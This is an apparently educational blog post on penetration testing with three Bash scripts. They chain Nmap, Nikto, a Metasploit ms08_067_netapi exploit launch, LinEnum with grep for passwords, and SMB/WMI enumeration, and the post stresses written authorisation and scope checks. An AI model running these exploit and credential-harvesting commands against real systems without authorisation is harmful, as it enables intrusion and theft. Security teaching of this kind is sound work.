Common tasks for penetration testing

Penetration testing, also known as “pen testing” or “ethical hacking,” is a method of evaluating the security of a computer system, network, or web application by simulating an attack from a malicious actor. The goal of penetration testing is to identify vulnerabilities and weaknesses in a system that could be exploited by a real attacker.

Penetration testing typically includes a combination of manual and automated techniques, such as:

Reconnaissance: Gathering information about the target system, such as IP addresses, open ports, and software versions.

Vulnerability scanning: Identifying known vulnerabilities in the target system.

Exploitation: Attempting to exploit identified vulnerabilities to gain access to the system.

Privilege escalation: Attempting to gain higher levels of access to the system once initial access has been gained.

Maintaining access: Establishing ways to retain access to the system, such as creating backdoors.

Clearing tracks: Attempting to cover tracks and remove any traces of the penetration test. In an authorised engagement this step is agreed with the client in advance, and every artifact the tester leaves behind (accounts, tools, backdoors) is logged so it can be cleaned up and verified afterwards.

Reporting: Documenting findings and recommendations for remediation.

Here is an example of a simple Bash script that can automate some of the common tasks in penetration testing:

#!/bin/bash
set -u

# Store the target IP address in a variable (it must be inside the agreed scope)
target="192.168.1.1"

# Use Nmap to scan for open ports and services. -A already implies -sV and -O,
# and -sS/-O require root. -oA writes nmap_scan.nmap, .gnmap and .xml
nmap -sS -A -T4 "$target" -oA nmap_scan

# Use Nikto to perform a vulnerability scan on a web server
nikto -h "http://$target" -o nikto_scan.txt

# Use Metasploit to launch an exploit against the target. "spool" captures the
# console output to msf.log (which the report below reads), RHOSTS is the
# module's option name, and "exit -y" leaves the console instead of hanging
msfconsole -q -x "spool msf.log; use exploit/windows/smb/ms08_067_netapi; set RHOSTS $target; exploit; spool off; exit -y"

# LinEnum is a local Linux enumeration script: it runs on a host you already
# have a shell on, not against a remote IP. Copy it to the compromised host and
# run it there; -r only names the report and -t enables the thorough checks
./LinEnum.sh -r linenum_report -t > linenum_output.txt

# Use grep to search through the output file and extract relevant information
grep -i "username" linenum_output.txt > user_info.txt
grep -i "password" linenum_output.txt > password_info.txt

# Create a report with the results of the penetration test
{
  echo "Penetration Test Report for $target"
  echo "-------------------------------------------------"
  echo ""
  echo "Open Ports and Services:"
  cat nmap_scan.nmap
  echo ""
  echo "Vulnerabilities:"
  cat nikto_scan.txt
  echo ""
  echo "Exploits Used:"
  cat msf.log
  echo ""
  echo "Information Gathered:"
  cat user_info.txt
  echo ""
  cat password_info.txt
} > report.txt

This script chains a few different tools into a basic penetration test of the target IP address. It starts by using Nmap to scan for open ports and services, then uses Nikto to perform a vulnerability scan on a web server, and then uses Metasploit to launch an exploit against the target system. It also runs LinEnum, which is a local Linux enumeration script and therefore has to be executed on a host you already have a shell on, rather than pointed at a remote IP. Finally, it writes a report.txt file containing all the results of the penetration test.

Here’s another example of a simple Bash script that can be used to perform some basic reconnaissance on a Windows server as part of a penetration testing engagement:

#!/bin/bash
set -u

# Define the target IP address or hostname
target="192.168.1.1"

# Credentials for the authenticated WMI query (placeholders; fill in from the engagement)
user="DOMAIN/username"
password="password"

# Perform a port scan using Nmap, keeping only the open ports from the grepable output
nmap -p139,445 "$target" -oG - | grep "open"

# Perform a SMB enumeration using enum4linux
enum4linux -a "$target"

# Perform a WMI query to gather information about the operating system.
# This is the Linux wmic client (wmi-client / pth-wmic); its credential syntax
# is -U 'DOMAIN/user%password'. It needs valid credentials and DCOM reachable
# on the target (TCP 135 plus a dynamic high port)
wmic -U "$user%$password" "//$target" "SELECT * FROM Win32_OperatingSystem"

# Perform a check for open shares (-N attempts a null session instead of prompting for a password)
smbclient -L "//$target" -N

# Perform a check for open RDP service
nmap -p 3389 "$target"

This script uses Nmap to perform a port scan on the target Windows server, looking for open ports 139 and 445, which are commonly used for the SMB (Server Message Block) protocol. Then it uses enum4linux to perform an SMB enumeration on the target server, gathering information about the system, shares and users. The script also uses WMI (Windows Management Instrumentation) to query the target server for information about the operating system; this query requires valid credentials, so it only works once you have obtained an account. Additionally, the script uses smbclient and Nmap to check for open file shares and for an exposed RDP service on the target server, respectively.
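Both scripts above run every tool unconditionally, whatever Nmap found. The following added example (written for this page, not code from the original post) shows the more usual pattern: parse Nmap's grepable output, run follow-up tools only for the services that are actually open (Nikto for HTTP, enum4linux for SMB, an RDP script for 3389), and refuse any target that is not listed in a written scope file. The scan text embedded in SAMPLE_GNMAP is constructed sample data so the parsing can be exercised offline; the function names, the scope-file convention and the output file names are this example's own assumptions, not conventions of Nmap or the other tools.

```shell
#!/bin/bash
# Added example: drive follow-up tools from Nmap's grepable (-oG) output
# instead of running everything blindly, and check the target against scope.
set -u

# Constructed sample `nmap -oG` output for a host with HTTP, SMB and RDP open
# (not a real scan). Port entries look like: port/state/protocol//service///
SAMPLE_GNMAP='# Nmap 7.94 scan initiated as: nmap -p- -oG - 192.168.1.1
Host: 192.168.1.1 ()  Status: Up
Host: 192.168.1.1 ()  Ports: 80/open/tcp//http///, 135/filtered/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///  Ignored State: closed (65530)
# Nmap done -- 1 IP address (1 host up) scanned'

# Read grepable output on stdin; print each open TCP port once, numerically sorted.
open_ports() {
  sed -n 's/^Host:.*Ports: //p' \
    | tr ',' '\n' \
    | awk -F/ '$2 == "open" && $3 == "tcp" { gsub(/ /, "", $1); print $1 }' \
    | sort -n -u
}

# $1: target, $2: scope file with one authorised IP or hostname per line.
# Exact, whole-line match only, so "192.168.1.10" does not pass as "192.168.1.1".
in_scope() {
  grep -qxF -- "$1" "$2"
}

# $1: target, remaining args: open ports. Prints one follow-up command per line,
# deduplicated (139 and 445 both map to the same enum4linux run).
plan_followups() {
  local target="$1"; shift
  local port
  for port in "$@"; do
    case "$port" in
      80|8080)  echo "nikto -h http://$target:$port -o nikto_$port.txt" ;;
      443|8443) echo "nikto -h https://$target:$port -o nikto_$port.txt" ;;
      139|445)  echo "enum4linux -a $target" ;;
      3389)     echo "nmap -p 3389 --script rdp-enum-encryption $target" ;;
    esac
  done | sort -u
}

# Live driver: scan, then run only the planned tools. Never runs automatically;
# invoke as: ./recon.sh <target> <scope-file>
run_recon() {
  local target="$1" scope_file="$2"
  if ! in_scope "$target" "$scope_file"; then
    echo "refusing to scan $target: not listed in $scope_file" >&2
    return 1
  fi
  nmap -p- -T4 -oG "nmap_$target.gnmap" "$target"
  set -- $(open_ports < "nmap_$target.gnmap")
  # The command strings were built only from the scope-checked target and the
  # port numbers parsed above, so evaluating them here is safe.
  plan_followups "$target" "$@" | while IFS= read -r cmd; do
    echo "[*] $cmd" | tee -a "followups_$target.log"
    eval "$cmd"
  done
}

if [ "$#" -eq 2 ]; then
  run_recon "$1" "$2"
fi
```

Running the functions against the constructed sample yields open ports 80, 139, 445 and 3389 and a plan of three commands (one Nikto run, one enum4linux run, one RDP script scan); the filtered 135/tcp is ignored. The scope check is deliberately an exact-line match so that a typo in the target cannot widen the test beyond what the client signed off.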

Please note that, like the previous script, this is only a simple example of what a penetration testing script could look like; it does not include all the steps of a comprehensive engagement. Some of the actions in these scripts are illegal without authorisation in many countries, so run them only against systems you have written permission to test. The results, and the way you interpret them, will vary with the target and the environment, and there is a lot more to penetration testing than running a script.

Andreas Bourakis

Software Engineer & Lecturer in Computing
